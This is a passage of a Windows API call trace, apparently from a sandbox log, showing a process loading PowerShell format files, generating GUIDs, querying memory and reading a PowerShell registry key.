	[0319.704] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xfdf615dd, Data2=0x47f8, Data3=0x48e3, Data4=([0]=0x9a, [1]=0x5b, [2]=0xe8, [3]=0xb2, [4]=0x85, [5]=0x45, [6]=0x33, [7]=0xeb))) returned 0x0
	[0319.704] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x5f731c8c, Data2=0xa7e8, Data3=0x4d23, Data4=([0]=0x97, [1]=0x28, [2]=0x3a, [3]=0xce, [4]=0x2, [5]=0x5, [6]=0xf2, [7]=0x6a))) returned 0x0
	[0319.704] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x7cf0b946, Data2=0x8674, Data3=0x489c, Data4=([0]=0xb9, [1]=0x72, [2]=0xb1, [3]=0x7d, [4]=0x67, [5]=0x6e, [6]=0xe, [7]=0x3e))) returned 0x0
	[0319.704] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x9208f1bf, Data2=0xb086, Data3=0x4dd1, Data4=([0]=0x82, [1]=0x1c, [2]=0x4c, [3]=0x1b, [4]=0xd9, [5]=0x6c, [6]=0xe8, [7]=0xcd))) returned 0x0
	[0319.705] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x3571346, Data2=0x346a, Data3=0x4b9e, Data4=([0]=0xb9, [1]=0x35, [2]=0xe7, [3]=0xea, [4]=0x8f, [5]=0x4c, [6]=0xd0, [7]=0x73))) returned 0x0
	[0319.705] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xf917fad5, Data2=0x67a, Data3=0x4c83, Data4=([0]=0x80, [1]=0xfe, [2]=0x10, [3]=0x3, [4]=0x66, [5]=0x7c, [6]=0xdf, [7]=0x9))) returned 0x0
	[0319.705] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1e989bfa, Data2=0x3347, Data3=0x4ec4, Data4=([0]=0x81, [1]=0xe2, [2]=0x6e, [3]=0xa, [4]=0x25, [5]=0x95, [6]=0x7c, [7]=0xc8))) returned 0x0
	[0319.705] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x4538ba6b, Data2=0x3268, Data3=0x4381, Data4=([0]=0x87, [1]=0x33, [2]=0x82, [3]=0xd7, [4]=0xaf, [5]=0x9b, [6]=0x68, [7]=0x50))) returned 0x0
	[0319.706] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x42bbbcc8, Data2=0xf438, Data3=0x45c3, Data4=([0]=0xac, [1]=0xad, [2]=0x39, [3]=0x14, [4]=0xab, [5]=0x85, [6]=0x98, [7]=0xc0))) returned 0x0
	[0319.706] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x8c79e9d0, Data2=0x9f03, Data3=0x4f95, Data4=([0]=0xac, [1]=0x2b, [2]=0xaa, [3]=0x29, [4]=0xe3, [5]=0x72, [6]=0xc7, [7]=0x1c))) returned 0x0
	[0319.706] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x262f2f14, Data2=0xd558, Data3=0x4e84, Data4=([0]=0x8d, [1]=0x7, [2]=0xa9, [3]=0xe0, [4]=0x8e, [5]=0xa, [6]=0x64, [7]=0x21))) returned 0x0
	[0319.706] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x8d608f1, Data2=0x5f1a, Data3=0x476d, Data4=([0]=0xba, [1]=0x54, [2]=0x22, [3]=0x4d, [4]=0xcc, [5]=0x81, [6]=0x66, [7]=0xa0))) returned 0x0
	[0319.707] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x70f7f50d, Data2=0x6690, Data3=0x4b66, Data4=([0]=0x93, [1]=0xc1, [2]=0xc2, [3]=0xc8, [4]=0xfe, [5]=0xef, [6]=0x6c, [7]=0x1))) returned 0x0
	[0319.707] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc6596def, Data2=0x6738, Data3=0x4c48, Data4=([0]=0xaf, [1]=0x43, [2]=0x8c, [3]=0xfe, [4]=0x38, [5]=0xdf, [6]=0x85, [7]=0x2d))) returned 0x0
	[0319.707] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb4b22ef9, Data2=0xd524, Data3=0x4e22, Data4=([0]=0xa9, [1]=0xcd, [2]=0xc7, [3]=0x1b, [4]=0xbe, [5]=0x21, [6]=0x55, [7]=0x5c))) returned 0x0
	[0319.707] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.707] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.708] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.709] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x4a872e11, Data2=0x6cc, Data3=0x4a30, Data4=([0]=0x99, [1]=0xee, [2]=0x5e, [3]=0xad, [4]=0xdb, [5]=0x3c, [6]=0x50, [7]=0xdf))) returned 0x0
	[0320.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0320.167] SetErrorMode (uMode=0x1) returned 0x1
	[0320.167] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0320.167] GetFileType (hFile=0x32c) returned 0x1
	[0320.167] SetErrorMode (uMode=0x1) returned 0x1
	[0320.167] GetFileType (hFile=0x32c) returned 0x1
	[0320.167] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.169] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.169] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.169] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.170] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.170] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.170] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x119, lpOverlapped=0x0) returned 1
	[0320.171] ReadFile (in: hFile=0x32c, lpBuffer=0x3594fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3594fc0*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0320.171] CloseHandle (hObject=0x32c) returned 1
	[0320.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0320.171] SetErrorMode (uMode=0x1) returned 0x1
	[0320.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0320.171] SetErrorMode (uMode=0x1) returned 0x1
	[0320.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0320.172] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x32c) returned 0x0
	[0320.172] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0320.172] CoTaskMemAlloc (cb=0x5a) returned 0x3d7030
	[0320.172] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x3d7030, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0320.172] CoTaskMemFree (pv=0x3d7030) 
	[0320.172] RegCloseKey (hKey=0x32c) returned 0x0
	[0320.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0320.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0320.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.175] VirtualQuery (in: lpAddress=0x1cbd40, lpBuffer=0x1ccc00, dwLength=0x30 | out: lpBuffer=0x1ccc00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0320.175] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc824f6b2, Data2=0x4f0, Data3=0x40b5, Data4=([0]=0x8b, [1]=0xc3, [2]=0xbf, [3]=0xce, [4]=0xcb, [5]=0x49, [6]=0x7e, [7]=0xf5))) returned 0x0
	[0320.176] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0320.176] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xba13da0c, Data2=0x2b54, Data3=0x4041, Data4=([0]=0x80, [1]=0xb4, [2]=0x3b, [3]=0x1f, [4]=0x5, [5]=0xb6, [6]=0x3c, [7]=0xe2))) returned 0x0
	[0320.176] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x22d2ed5f, Data2=0x9b6d, Data3=0x4bb9, Data4=([0]=0x88, [1]=0x16, [2]=0xe3, [3]=0x27, [4]=0xf1, [5]=0xe3, [6]=0x4d, [7]=0x10))) returned 0x0
	[0320.177] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xfbda1cd2, Data2=0x93d4, Data3=0x4c66, Data4=([0]=0x96, [1]=0xf1, [2]=0xc8, [3]=0x6f, [4]=0xaa, [5]=0x2f, [6]=0x78, [7]=0x3f))) returned 0x0
	[0320.177] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0320.177] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0320.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0320.178] SetErrorMode (uMode=0x1) returned 0x1
	[0320.178] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0320.178] GetFileType (hFile=0x32c) returned 0x1
	[0320.178] SetErrorMode (uMode=0x1) returned 0x1
	[0320.178] GetFileType (hFile=0x32c) returned 0x1
	[0320.178] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.179] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.180] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.180] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.181] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.181] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.181] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.181] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.182] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.182] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.183] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.183] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.183] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.183] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.184] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.184] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.185] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.186] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.186] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.186] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.186] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.187] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.187] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.187] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.187] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.188] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.188] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.188] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.188] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.189] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.189] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.189] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.192] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.192] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.192] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.193] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.193] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.193] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.193] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.194] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
